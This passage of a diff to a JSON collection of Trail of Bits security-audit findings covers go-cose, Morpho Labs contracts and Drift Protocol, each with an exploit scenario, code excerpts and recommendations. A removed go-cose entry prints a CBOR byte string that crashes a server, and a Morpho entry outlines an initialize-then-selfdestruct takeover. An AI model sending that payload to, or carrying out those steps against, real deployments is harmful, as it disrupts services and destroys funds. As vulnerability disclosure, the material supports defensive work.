node/pkg/watchers/evm/connectors/poller.go#L149–L164 Exploit Scenario A developer adds a new chain to the watcher using BlockPollConnector and forgets to add a PollFinalizer. 
Because a finalizer is not required to receive the latest blocks, transactions that were not included in the blockchain are considered valid, and funds are incorrectly transferred without corresponding deposits. Recommendations Short term, rewrite the block poller to require a finalizer. This makes the configuration of the block poller explicit and clarifies that a DefaultFinalizer is being used, indicating that no extra validations are being performed. Long term, document the configuration and assumptions of each chain. Then, see if any changes could be made to the code to clarify the developers' intentions.",
"labels": [
"Trail of Bits",
"Severity: Informational",
"Difficulty: High"
]
},
{
- "title": "1. Unmarshalling can cause a panic if any header labels are unhashable ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf",
- "body": "The ensureCritical function checks that all critical labels exist in the protected header. The check for each label is shown in Figure 1.1. 161 if _, ok := h[label]; !ok { Figure 1.1: Line 161 of headers.go The label in this case is deserialized from the user's CBOR input. If the label is a non-hashable type (e.g., a slice or a map), then Go will runtime panic on line 161. Exploit Scenario Alice wishes to crash a server running go-cose. She sends the following CBOR message to the server: \\xd2\\x84G\\xc2\\xa1\\x02\\xc2\\x84@0000C000C000. When the server attempts to validate the critical headers during unmarshalling, it panics on line 161. Recommendations Short term, add a validation step to ensure that the elements of the critical header are valid labels. Long term, integrate go-cose's existing fuzz tests into the CI pipeline. Although this bug was not discovered using go-cose's preexisting fuzz tests, the tests likely would have discovered it if they ran for enough time. Fix Analysis This issue has been resolved. Pull request #78, committed to the main branch in b870a00b4a0455ab5c3da1902570021e2bac12da, adds validations to ensure that critical headers are only integers or strings.",
"labels": [
"Trail of Bits",
"Severity: High",
"Difficulty: Low"
]
},
{
- "title": "2. crit label is permitted in unvalidated headers ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf",
- "body": "The crit header parameter identifies which header labels must be understood by an application receiving the COSE message. Per RFC 8152, this value must be placed in the protected header bucket, which is authenticated by the message signature. Figure 2.1: Excerpt from RFC 8152 section 3.1 Currently, the implementation ensures during marshaling and unmarshaling that if the crit parameter is present in the protected header, then all indicated labels are also present in the protected header. However, the implementation does not ensure that the crit parameter is not present in the unprotected bucket. If a user mistakenly uses the unprotected header for the crit parameter, then other conforming COSE implementations may reject the message and the message may be exposed to tampering. Exploit Scenario A library user mistakenly places the crit label in the unprotected header, allowing an adversary to manipulate the meaning of the message by adding, removing, or changing the set of critical headers. Recommendations Add a check during ensureCritical to verify that the crit label is not present in the unprotected header bucket. 
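A minimal sketch of such a check, using simplified stand-ins for go-cose's header types (the map shape and label constant below are illustrative, not the library's actual API):

```go
package main

import (
	"errors"
	"fmt"
)

// Label is a simplified stand-in for a COSE header parameter label.
type Label = int64

const labelCrit Label = 2 // the COSE "crit" header parameter label

// ensureCritNotUnprotected sketches the recommended check: reject messages
// whose unprotected bucket carries the crit parameter, since unprotected
// headers are not covered by the message signature.
func ensureCritNotUnprotected(unprotected map[any]any) error {
	if _, ok := unprotected[labelCrit]; ok {
		return errors.New("crit header parameter must not appear in the unprotected bucket")
	}
	return nil
}

func main() {
	bad := map[any]any{labelCrit: []any{int64(1)}}
	fmt.Println(ensureCritNotUnprotected(bad))           // error
	fmt.Println(ensureCritNotUnprotected(map[any]any{})) // <nil>
}
```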
Fix Analysis This issue has been resolved. Pull request #81, committed to the main branch in 62383c287782d0ba5a6f82f984da0b841e434298, adds validations to ensure that the crit label is not present in unprotected headers.",
"labels": [
"Trail of Bits",
"Severity: Low",
"Difficulty: High"
]
},
{
- "title": "3. Generic COSE header types are not validated ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/Microsoft-go-cose.pdf",
- "body": "Section 3.1 of RFC 8152 defines a number of common COSE header parameters and their associated value types. Applications using the go-cose library may rely on COSE-defined headers decoded by the library to be of a specified type. For example, the COSE specification defines the content-type header (label #3) as one of two types: a text string or an unsigned integer. The go-cose library validates only the alg and crit parameters, not content-type. See Figure 3.1 for a list of defined header types. Figure 3.1: RFC 8152 Section 3.1, Table 2 Further header types are defined by the IANA COSE Header Parameter Registry. Exploit Scenario An application uses go-cose to verify and validate incoming COSE messages. The application uses the content-type header to index a map, expecting the content type to be a valid string or integer. An attacker could, however, supply an unhashable value, causing the application to panic. Recommendations Short term, explicitly document which IANA-defined headers or label ranges are and are not validated. Long term, validate commonly used headers for type and semantic consistency. 
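To illustrate that long-term recommendation, here is a hedged sketch of a content-type type check, again using a simplified header map rather than go-cose's actual types:

```go
package main

import "fmt"

const labelContentType = int64(3) // the COSE content-type header parameter label

// validateContentType sketches the kind of type check the finding calls for:
// RFC 8152 allows content-type to be a text string or an unsigned integer,
// so anything else (including unhashable values) is rejected up front.
func validateContentType(headers map[any]any) error {
	switch v := headers[labelContentType].(type) {
	case nil:
		return nil // header absent
	case string:
		return nil // text string form is allowed
	case int64, uint64:
		return nil // integer form is allowed (decoders differ on signedness)
	default:
		return fmt.Errorf("content-type header has invalid type %T", v)
	}
}

func main() {
	fmt.Println(validateContentType(map[any]any{labelContentType: "application/cbor"})) // <nil>
	fmt.Println(validateContentType(map[any]any{labelContentType: []any{"x"}}))         // error
}
```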
For example, once counter signatures are implemented, the counter-signature (label #7) header should be validated for well-formedness during unmarshalling.",
"labels": [
"Trail of Bits",
"Severity: Informational",
"Difficulty: High"
]
},
{
- "title": "1. Lack of two-step process for contract ownership changes ",
- "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf",
- "body": "The owner of the IncentivesVault contract and other Ownable Morpho contracts can be changed by calling the transferOwnership function. This function internally calls the _transferOwnership function, which immediately sets the contract's new owner. Making such a critical change in a single step is error-prone and can lead to irrevocable mistakes. 13 contract IncentivesVault is IIncentivesVault, Ownable { Figure 1.1: Inheritance of contracts/compound/IncentivesVault.sol 62 function transferOwnership(address newOwner) public virtual onlyOwner { 63 require(newOwner != address(0), \"Ownable: new owner is the zero address\"); 64 _transferOwnership(newOwner); 65 } Figure 1.2: The transferOwnership function in @openzeppelin/contracts/access/Ownable.sol Exploit Scenario Bob, the IncentivesVault owner, invokes transferOwnership() to change the contract's owner but accidentally enters the wrong address. 
As a result, he permanently loses access to the contract. Recommendations Short term, for contract ownership transfers, implement a two-step process, in which the owner proposes a new address and the transfer is completed once the new address has executed a call to accept the role. Long term, identify and document all possible actions that can be taken by privileged accounts and their associated risks. This will facilitate reviews of the codebase and prevent future mistakes.", + "title": "3. Invalid audit.toml prevents cargo audit from being run ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The project's audit.toml file contains an invalid key. This makes running cargo audit on the project impossible. The relevant part of the audit.toml file appears in figure 3.1. The packages key is unrecognized by cargo audit. As a result, cargo audit produces the error in figure 3.2 when run on the protocol-v2 repository. [packages] source = \"all\" # \"all\", \"public\" or \"local\" Figure 3.1: .cargo/audit.toml#L27L28 error: cargo-audit fatal error: parse error: unknown field `packages`, expected one of `advisories`, `database`, `output`, `target`, `yanked` at line 30 column 1 Figure 3.2: Error produced by cargo audit when run on the protocol-v2 repository Exploit Scenario A vulnerability is discovered in a protocol-v2 dependency. A RUSTSEC advisory is issued for the vulnerability, but because cargo audit cannot be run on the repository, the vulnerability goes unnoticed. Users suffer financial loss. Recommendations Short term, either remove the packages table from the audit.toml file or replace it with a table recognized by cargo audit. In the project's current state, cargo audit cannot be run on the project. Long term, regularly run cargo audit in CI and verify that it runs to completion without producing any errors or warnings. This will help the project receive the full benefits of running cargo audit by identifying dependencies with RUSTSEC advisories.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2292,19 +5050,19 @@ ] }, { - "title": "2. Incomplete information provided in Withdrawn and Repaid events ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The core operations in the PositionsManager contract emit events with parameters that provide information about the operations' actions. However, two events, Withdrawn and Repaid, do not provide complete information. For example, the withdrawLogic function, which performs withdrawals, takes a _supplier address (the user supplying the tokens) and _receiver address (the user receiving the tokens): /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external Figure 2.1: The function signature of PositionsManager's withdrawLogic function However, the corresponding event in _safeWithdrawLogic records only the msg.sender of the transaction, so the _supplier and _receiver involved in the transaction are unclear.
Moreover, if a withdrawal is performed as part of a liquidation operation, three separate addresses may be involved (the _supplier, the _receiver, and the _user who triggered the liquidation), and those monitoring events will have to cross-reference multiple events to understand whose tokens moved where. /// @notice Emitted when a withdrawal happens. /// @param _user The address of the withdrawer. /// @param _poolTokenAddress The address of the market from where assets are withdrawn. /// @param _amount The amount of assets withdrawn (in underlying). /// @param _balanceOnPool The supply balance on pool after update. /// @param _balanceInP2P The supply balance in peer-to-peer after update. event Withdrawn( address indexed _user, Figure 2.2: The declaration of the Withdrawn event in PositionsManager emit Withdrawn( msg.sender, _poolTokenAddress, _amount, supplyBalanceInOf[_poolTokenAddress][msg.sender].onPool, supplyBalanceInOf[_poolTokenAddress][msg.sender].inP2P ); Figure 2.3: The emission of the Withdrawn event in the _safeWithdrawLogic function A similar issue is present in the _safeRepayLogic function's Repaid event. Recommendations Short term, add the relevant addresses to the Withdrawn and Repaid events. Long term, review all of the events emitted by the system to ensure that they emit sufficient information.", + "title": "4. Race condition in Drift SDK ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "A race condition in the Drift SDK causes client programs to operate on non-existent or possibly stale data. The race condition affects many of the project's Anchor tests, making them unreliable. Use of the SDK in production could have financial implications. When running the Anchor tests, the error in figure 4.1 appears frequently. The data field that the error refers to is read by the getUserAccount function (figure 4.2). This function tries to read the data field from a DataAndSlot object obtained by calling getUserAccountAndSlot (figure 4.3). That DataAndSlot object is set by the handleRpcResponse function (figure 4.4). TypeError: Cannot read properties of undefined (reading 'data') at User.getUserAccount (sdk/src/user.ts:122:56) at DriftClient.getUserAccount (sdk/src/driftClient.ts:663:37) at DriftClient. (sdk/src/driftClient.ts:1005:25) at Generator.next () at fulfilled (sdk/src/driftClient.ts:28:58) at processTicksAndRejections (node:internal/process/task_queues:96:5) Figure 4.1: Error that appears frequently when running the Anchor tests public getUserAccount(): UserAccount { return this.accountSubscriber.getUserAccountAndSlot().data; } Figure 4.2: sdk/src/user.ts#L121L123 public getUserAccountAndSlot(): DataAndSlot { this.assertIsSubscribed(); return this.userDataAccountSubscriber.dataAndSlot; } Figure 4.3: sdk/src/accounts/webSocketUserAccountSubscriber.ts#L72L75 handleRpcResponse(context: Context, accountInfo?: AccountInfo): void { ... if (newBuffer && (!oldBuffer || !newBuffer.equals(oldBuffer))) { this.bufferAndSlot = { buffer: newBuffer, slot: newSlot, }; const account = this.decodeBuffer(newBuffer); this.dataAndSlot = { data: account, slot: newSlot, }; this.onChange(account); } } Figure 4.4: sdk/src/accounts/webSocketAccountSubscriber.ts#L55L95 If a developer calls getUserAccount but handleRpcResponse has not been called since the last time the account was updated, stale data will be returned.
If handleRpcResponse has never been called for the account in question, an error like that shown in figure 4.1 arises. Note that a developer can avoid the race by calling WebSocketAccountSubscriber.fetch (figure 4.5). However, the developer must manually identify locations where such calls are necessary. Errors like the one shown in figure 4.1 appear frequently when running the Anchor tests, which suggests that identifying such locations is nontrivial. async fetch(): Promise<void> { const rpcResponse = await this.program.provider.connection.getAccountInfoAndContext( this.accountPublicKey, (this.program.provider as AnchorProvider).opts.commitment ); this.handleRpcResponse(rpcResponse.context, rpcResponse?.value); } Figure 4.5: sdk/src/accounts/webSocketAccountSubscriber.ts#L46L53 We suspect this problem applies to not just user accounts, but any account fetched via a subscription mechanism (e.g., state accounts or perp market accounts). Note that despite the apparent race condition, Drift Protocol states that the tests run reliably for them. Exploit Scenario Alice, unaware of the race condition, writes client code that uses the Drift SDK. Alice's code unknowingly operates on stale data and proceeds with a transaction, believing it will result in financial gain. However, when processed with actual on-chain data, the transaction results in financial loss for Alice. Recommendations Short term, rewrite all account getter functions so that they automatically call WebSocketAccountSubscriber.fetch. This will eliminate the need for developers to deal with the race manually. Long term, investigate whether using a subscription mechanism is actually needed. Another Solana RPC call could solve the same problem yet be more efficient than a subscription combined with a manual fetch.", "labels": [ "Trail of Bits", - "Severity: High", + "Severity: Undetermined", "Difficulty: Low" ] }, { - "title": "3. Missing access control check in withdrawLogic ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The PositionsManager contract's withdrawLogic function does not perform any access control checks. In practice, this issue is not exploitable, as all interactions with this contract will be through delegatecalls with a hard-coded msg.sender sent from the main Morpho contract. However, if this code is ever reused or if the architecture of the system is ever modified, this guarantee may no longer hold, and users without the proper access may be able to withdraw funds. /// @dev Implements withdraw logic with security checks. /// @param _poolTokenAddress The address of the market the user wants to interact with. /// @param _amount The amount of token (in underlying). /// @param _supplier The address of the supplier. /// @param _receiver The address of the user who will receive the tokens. /// @param _maxGasForMatching The maximum amount of gas to consume within a matching engine loop. function withdrawLogic( address _poolTokenAddress, uint256 _amount, address _supplier, address _receiver, uint256 _maxGasForMatching ) external { Figure 3.1: The withdrawLogic function, which takes a supplier and whose comments note that it performs security checks Recommendations Short term, add a check to the withdrawLogic function to ensure that it withdraws funds only from the msg.sender. Long term, implement security checks consistently throughout the codebase.", + "title": "5.
Loose size coupling between function invocation and requirement ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The implementation of the emit_stack function relies on the caller to use a sufficiently large buffer space to hold a Base64-encoded representation of the discriminator along with the serialized event. Failure to provide sufficient space will result in an out-of-bounds attempt on either the write operation or the base64::encode_config_slice call. emit_stack::<_, 424>(order_action_record); Figure 5.1: programs/drift/src/controller/orders.rs#L545 pub fn emit_stack<T, const N: usize>(event: T) { let mut data_buf = [0u8; N]; let mut out_buf = [0u8; N]; emit_buffers(event, &mut data_buf[..], &mut out_buf[..]) } pub fn emit_buffers<T>( event: T, data_buf: &mut [u8], out_buf: &mut [u8], ) { let mut data_writer = std::io::Cursor::new(data_buf); data_writer .write_all(&T::discriminator()) .unwrap(); borsh::to_writer(&mut data_writer, &event).unwrap(); let data_len = data_writer.position() as usize; let out_len = base64::encode_config_slice( &data_writer.into_inner()[0..data_len], base64::STANDARD, out_buf, ); let msg_bytes = &out_buf[0..out_len]; let msg_str = unsafe { std::str::from_utf8_unchecked(msg_bytes) }; msg!(msg_str); } Figure 5.2: programs/drift/src/state/events.rs#L482L511 Exploit Scenario A maintainer of the smart contract is unaware of this implicit size requirement and adds a call to emit_stack using too small a buffer, or changes are made to a type without a corresponding change to all places where emit_stack uses that type. If the changed code is not covered by tests, the problem will manifest during contract operation, and could cause an instruction to panic, thereby reverting the transaction. Recommendations Short term, add a size constant to the type, and calculate the amount of space required for holding the respective buffers. This ensures that changes to a type's size can be made consistently throughout the code. Long term, create a trait to be used by the types with which emit_stack is intended to work. This can be used to handle the size of the type, and also any other future requirement for types used by emit_stack.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2312,9 +5070,9 @@ ] }, { - "title": "4. Lack of zero address checks in setter functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "Certain setter functions fail to validate incoming arguments, so callers can accidentally set important state variables to the zero address. A mistake like this could initially go unnoticed because a delegatecall to an address without code will return success. /// @notice Sets the `positionsManager`. /// @param _positionsManager The new `positionsManager`. function setPositionsManager(IPositionsManager _positionsManager) external onlyOwner { positionsManager = _positionsManager; emit PositionsManagerSet(address(_positionsManager)); } Figure 4.1: An important address setter in MorphoGovernance Exploit Scenario Alice and Bob control a multisignature wallet that is the owner of a deployed Morpho contract. They decide to set _positionsManager to a newly upgraded contract but, while invoking setPositionsManager, they mistakenly omit the address. As a result, _positionsManager is set to the zero address, resulting in undefined behavior.
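Finding 5's long-term recommendation can be made concrete with a trait that ties each event type to the buffer capacity emit_stack needs. The sketch below is illustrative only: the EmittableEvent name, the OrderActionRecord stand-in, and the SERIALIZED_LEN figure are assumptions rather than Drift code; only the Base64 three-bytes-in/four-bytes-out sizing rule is standard.

// Minimal sketch of a size-carrying trait for emit_stack-style logging.
trait EmittableEvent {
    // Upper bound on discriminator + Borsh-serialized size, in bytes (hypothetical).
    const SERIALIZED_LEN: usize;
    // Base64 encodes every 3 input bytes as 4 output bytes, rounded up.
    const ENCODED_LEN: usize = (Self::SERIALIZED_LEN + 2) / 3 * 4;
}

struct OrderActionRecord; // fields elided

impl EmittableEvent for OrderActionRecord {
    const SERIALIZED_LEN: usize = 312; // illustrative figure only
}

fn main() {
    // Callers no longer hand-pick literals like 424; the type decides.
    let data_buf = vec![0u8; OrderActionRecord::SERIALIZED_LEN];
    let out_buf = vec![0u8; OrderActionRecord::ENCODED_LEN];
    assert!(out_buf.len() >= data_buf.len()); // encoding never shrinks the data
}

With this shape, changing a type's layout forces the size change through the one associated constant instead of through every call site.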
Recommendations Short term, add zero-value checks to all important address setters to ensure that owners cannot accidentally set addresses to incorrect values, misconfiguring the system. Specifically, add zero-value checks to the setPositionsManager, setRewardsManager, setInterestRates, setTreasuryVault, and setIncentivesVault functions, as well as the _cETH and _cWeth parameters of the initialize function in the MorphoGovernance contract. Long term, incorporate Slither into a continuous integration pipeline, which will continuously warn developers when functions do not have checks for zero values.", + "title": "6. The zero-copy feature in Anchor is experimental ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "Several structs for keeping state use Anchor's zero-copy functionality. The Anchor documentation states that this is still an experimental feature that should be used only when Borsh serialization cannot be used without hitting the stack or heap limits. Exploit Scenario The Anchor framework has a bug in the zero-copy feature, or updates it with a breaking change, in a way that affects the security model of the Drift smart contract. An attacker discovers this problem and leverages it to steal funds from the contract. #[account(zero_copy)] #[derive(Default, Eq, PartialEq, Debug)] #[repr(C)] pub struct User { pub authority: Pubkey, pub delegate: Pubkey, pub name: [u8; 32], pub spot_positions: [SpotPosition; 8], pub perp_positions: [PerpPosition; 8], pub orders: [Order; 32], pub last_add_perp_lp_shares_ts: i64, pub total_deposits: u64, pub total_withdraws: u64, pub total_social_loss: u64, // Fees (taker fees, maker rebate, referrer reward, filler reward) and pnl for perps pub settled_perp_pnl: i64, // Fees (taker fees, maker rebate, filler reward) for spot pub cumulative_spot_fees: i64, pub cumulative_perp_funding: i64, pub liquidation_margin_freed: u64, // currently unimplemented pub liquidation_start_ts: i64, // currently unimplemented pub next_order_id: u32, pub max_margin_ratio: u32, pub next_liquidation_id: u16, pub sub_account_id: u16, pub status: UserStatus, pub is_margin_trading_enabled: bool, pub padding: [u8; 26], } Figure 6.1: Example of a struct using zero copy Recommendations Short term, evaluate if it is possible to move away from using zero copy without hitting the stack or heap limits, and do so if possible. Not relying on experimental features reduces the risk of exposure to bugs in the Anchor framework. Long term, adopt a conservative stance by using stable versions of packages and features. This reduces both risk and time spent on maintaining compatibility with code still in flux.", "labels": [ "Trail of Bits", "Severity: Informational", @@ -2322,29 +5080,29 @@ ] }, { - "title": "5. Risky use of toggle functions ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "The codebase uses a toggle function, togglePauseStatus, to pause and unpause a market. This function is error-prone because setting a pause status on a market depends on the market's current state. Multiple uncoordinated pauses could result in a failure to pause a market in the event of an incident. /// @notice Toggles the pause status on a specific market in case of emergency. /// @param _poolTokenAddress The address of the market to pause/unpause.
function togglePauseStatus(address _poolTokenAddress) external onlyOwner isMarketCreated(_poolTokenAddress) { Types.MarketStatus storage marketStatus_ = marketStatus[_poolTokenAddress]; bool newPauseStatus = !marketStatus_.isPaused; marketStatus_.isPaused = newPauseStatus; emit PauseStatusChanged(_poolTokenAddress, newPauseStatus); } Figure 5.1: The togglePauseStatus method in MorphoGovernance This issue also applies to togglePartialPauseStatus, toggleP2P, and toggleCompRewardsActivation in MorphoGovernance and to togglePauseStatus in IncentivesVault. Exploit Scenario All signers of a 4-of-9 multisignature wallet that owns a Morpho contract notice an ongoing attack that is draining user funds from the protocol. Two groups of four signers hurry to independently call togglePauseStatus, resulting in a failure to pause the system and leading to the further loss of funds. Recommendations Short term, replace the toggle functions with ones that explicitly set the pause status to true or false. Long term, carefully review the incident response plan and ensure that it leaves as little room for mistakes as possible.", + "title": "7. Hard-coded indices into account data ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The implementations for both PerpMarketMap and SpotMarketMap use hard-coded indices into the accounts' data in order to retrieve the market_index property without having to deserialize all the data. // market index 1160 bytes from front of account let market_index = u16::from_le_bytes(*array_ref![data, 1160, 2]); Figure 7.1: programs/drift/src/state/perp_market_map.rs#L110L111 let market_index = u16::from_le_bytes(*array_ref![data, 684, 2]); Figure 7.2: programs/drift/src/state/spot_market_map.rs#L174 Exploit Scenario Alice, a Drift Protocol developer, changes the layout of the structure or the width of the market_index property but fails to update one or more of the hard-coded indices. Mallory notices this bug and finds a way to use it to steal funds. Recommendations Short term, add consts that include the value of the indices and the type size. Also add comments explaining the calculation of the values. This ensures that by updating the constants, all code relying on the operation will retrieve the correct part of the underlying data. Long term, add an implementation to the struct to unpack the market_index from the serialized state. This reduces the maintenance burden of updating the code that accesses data in this way.", "labels": [ "Trail of Bits", - "Severity: Low", - "Difficulty: Medium" + "Severity: Informational", + "Difficulty: High" ] }, { - "title": "6. Anyone can destroy Morpho's implementation ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "An incorrect access control on the initialize function for Morpho's implementation contract allows anyone to destroy the contract. Morpho uses the delegatecall proxy pattern for upgradeability: abstract contract MorphoStorage is OwnableUpgradeable, ReentrancyGuardUpgradeable { Figure 6.1: contracts/compound/MorphoStorage.sol#L16 With this pattern, a proxy contract is deployed and executes a delegatecall to the implementation contract for certain operations. Users are expected to interact with the system through this proxy. However, anyone can also directly call Morpho's implementation contract.
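Finding 7's short-term recommendation (named constants plus a documented derivation) might look like the following sketch. Only the 1160 offset comes from figure 7.1; the constant names, the assumed 8-byte discriminator split, and the bounds-checked reader are our own illustration, not Drift code.

// Named, documented offsets instead of scattered literals.
const DISCRIMINATOR_LEN: usize = 8; // Anchor account discriminator (assumed)
const PERP_MARKET_INDEX_OFFSET: usize = DISCRIMINATOR_LEN + 1152; // = 1160, as in figure 7.1
const MARKET_INDEX_LEN: usize = core::mem::size_of::<u16>();

// Reads market_index from raw account data, bounds-checked.
fn read_perp_market_index(data: &[u8]) -> Option<u16> {
    let bytes = data.get(PERP_MARKET_INDEX_OFFSET..PERP_MARKET_INDEX_OFFSET + MARKET_INDEX_LEN)?;
    Some(u16::from_le_bytes([bytes[0], bytes[1]]))
}

fn main() {
    let mut data = vec![0u8; 2048];
    data[PERP_MARKET_INDEX_OFFSET..PERP_MARKET_INDEX_OFFSET + MARKET_INDEX_LEN]
        .copy_from_slice(&7u16.to_le_bytes());
    assert_eq!(read_perp_market_index(&data), Some(7));
}

A layout change then requires touching one constant, and every reader follows automatically.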
Despite the use of the proxy pattern, the implementation contract itself also has delegatecall capacities. For example, setReserveFactor, through its call to the updateP2PIndexes function, executes a delegatecall on user-provided addresses: function setReserveFactor(address _poolTokenAddress, uint16 _newReserveFactor) external onlyOwner isMarketCreated(_poolTokenAddress) { if (_newReserveFactor > MAX_BASIS_POINTS) revert ExceedsMaxBasisPoints(); updateP2PIndexes(_poolTokenAddress); Figure 6.2: contracts/compound/MorphoGovernance.sol#L203-L209 function updateP2PIndexes(address _poolTokenAddress) public { address(interestRatesManager).functionDelegateCall( abi.encodeWithSelector( interestRatesManager.updateP2PIndexes.selector, _poolTokenAddress ) ); } Figure 6.3: contracts/compound/MorphoUtils.sol#L119-L126 These functions are protected by the onlyOwner modifier; however, the system's owner is set by the initialize function, which is callable by anyone: function initialize( IPositionsManager _positionsManager, IInterestRatesManager _interestRatesManager, IComptroller _comptroller, Types.MaxGasForMatching memory _defaultMaxGasForMatching, uint256 _dustThreshold, uint256 _maxSortedUsers, address _cEth, address _wEth ) external initializer { __ReentrancyGuard_init(); __Ownable_init(); Figure 6.4: contracts/compound/MorphoGovernance.sol#L114-L125 As a result, anyone can call Morpho.initialize to become the owner of the implementation and execute any delegatecall from the implementation, including to a contract containing a selfdestruct. Doing so will cause the proxy to point to a contract that has been destroyed. This issue is also present in PositionsManagerForAave. Exploit Scenario The system is deployed. Eve calls Morpho.initialize on the implementation and then calls setReserveFactor, triggering a delegatecall to an attacker-controlled contract that self-destructs. As a result, the system stops working. Recommendations Short term, add a constructor in MorphoStorage and PositionsManagerForAaveStorage that will set an is_implementation variable to true and check that this variable is false before executing any critical operation (such as initialize, delegatecall, and selfdestruct). By setting this variable in the constructor, it will be set only in the implementation and not in the proxy. Long term, carefully review the pitfalls of using the delegatecall proxy pattern. References Breaking Aave Upgradeability", + "title": "8. Missing verification of maker and maker_stats accounts ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "The handle_place_and_take_perp_order and handle_place_and_take_spot_order functions retrieve two additional accounts that are passed to the instruction: maker and maker_stats. However, there is no check that the two accounts are linked (i.e., that their authority is the same). Due to time constraints, we were unable to determine the impact of this finding.
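The linkage check that finding 8 reports as missing reduces to comparing the two authorities before the accounts are used; in Drift's get_maker_and_maker_stats (quoted in figure 8.1 below), such a validation would run before the accounts are returned. In this sketch, User, UserStats, and the error variant are stand-ins, not Drift's definitions.

// Minimal sketch: the maker User account and the maker UserStats account
// must share one authority. All types here are illustrative stand-ins.
#[derive(Debug, PartialEq)]
enum ErrorCode {
    MakerStatsAuthorityMismatch,
}

struct User { authority: [u8; 32] }      // stand-in for a Pubkey field
struct UserStats { authority: [u8; 32] }

fn validate_maker_linkage(maker: &User, maker_stats: &UserStats) -> Result<(), ErrorCode> {
    if maker.authority != maker_stats.authority {
        return Err(ErrorCode::MakerStatsAuthorityMismatch);
    }
    Ok(())
}

fn main() {
    let maker = User { authority: [1; 32] };
    let unlinked_stats = UserStats { authority: [2; 32] };
    assert_eq!(
        validate_maker_linkage(&maker, &unlinked_stats),
        Err(ErrorCode::MakerStatsAuthorityMismatch)
    );
}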
pub fn get_maker_and_maker_stats<'a>( account_info_iter: &mut Peekable, ) -> DriftResult<(AccountLoader<'a, User>, AccountLoader<'a, UserStats>)> { let maker_account_info = next_account_info(account_info_iter).or(Err(ErrorCode::MakerNotFound))?; validate!( maker_account_info.is_writable, ErrorCode::MakerMustBeWritable )?; let maker: AccountLoader = AccountLoader::try_from(maker_account_info).or(Err(ErrorCode::CouldNotDeserializeMaker))?; let maker_stats_account_info = next_account_info(account_info_iter).or(Err(ErrorCode::MakerStatsNotFound))?; validate!( maker_stats_account_info.is_writable, ErrorCode::MakerStatsMustBeWritable )?; let maker_stats: AccountLoader = AccountLoader::try_from(maker_stats_account_info) .or(Err(ErrorCode::CouldNotDeserializeMakerStats))?; Ok((maker, maker_stats)) } Figure 8.1: programs/drift/src/instructions/optional_accounts.rs#L47L74 Exploit Scenario Mallory passes two unlinked accounts of the correct type in the places for maker and maker_stats, respectively. This causes the contract to operate outside of its intended use. Recommendations Short term, add a check that the authority of the two accounts is the same. Long term, add all code for authentication of accounts to the front of instruction handlers. This increases the clarity of the checks and helps with auditing the authentication.", "labels": [ "Trail of Bits", - "Severity: High", - "Difficulty: Low" + "Severity: Undetermined", + "Difficulty: Medium" ] }, { - "title": "7. Lack of return value checks during token transfers ", - "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/MorphoLabs.pdf", - "body": "In certain parts of the codebase, contracts that execute transfers of the Morpho token do not check the values returned from those transfers. The development of the Morpho token was not yet complete at the time of the audit, so we were unable to review the code specific to the Morpho token. Some tokens that are not ERC20 compliant return false instead of reverting, so failure to check such return values could result in undefined behavior, including the loss of funds. If the Morpho token adheres to ERC20 standards, then this issue may not pose a risk; however, due to the lack of return value checks, the possibility of undefined behavior cannot be eliminated. function transferMorphoTokensToDao(uint256 _amount) external onlyOwner { morphoToken.transfer(morphoDao, _amount); emit MorphoTokensTransferred(_amount); } Figure 7.1: The transferMorphoTokensToDao method in IncentivesVault Exploit Scenario The Morpho token code is completed and deployed alongside the other Morpho system components. It is implemented in such a way that it returns false instead of reverting when transfers fail, leading to undefined behavior. Recommendations Short term, consider using a safeTransfer library for all token transfers. Long term, review the token integration checklist and check all the components of the system to ensure that they interact with tokens safely.", + "title": "9. Panics used for error handling ", + "html_url": "https://github.com/trailofbits/publications/tree/master/reviews/2022-12-driftlabs-driftprotocol-securityreview.pdf", + "body": "In several places, the code panics when an arithmetic overflow or underflow occurs. Panics should be reserved for programmer errors (e.g., assertion violations). Panicking on user errors dilutes the utility of the panic operation. An example appears in figure 9.1. The adjust_amm function uses both the question mark operator (?
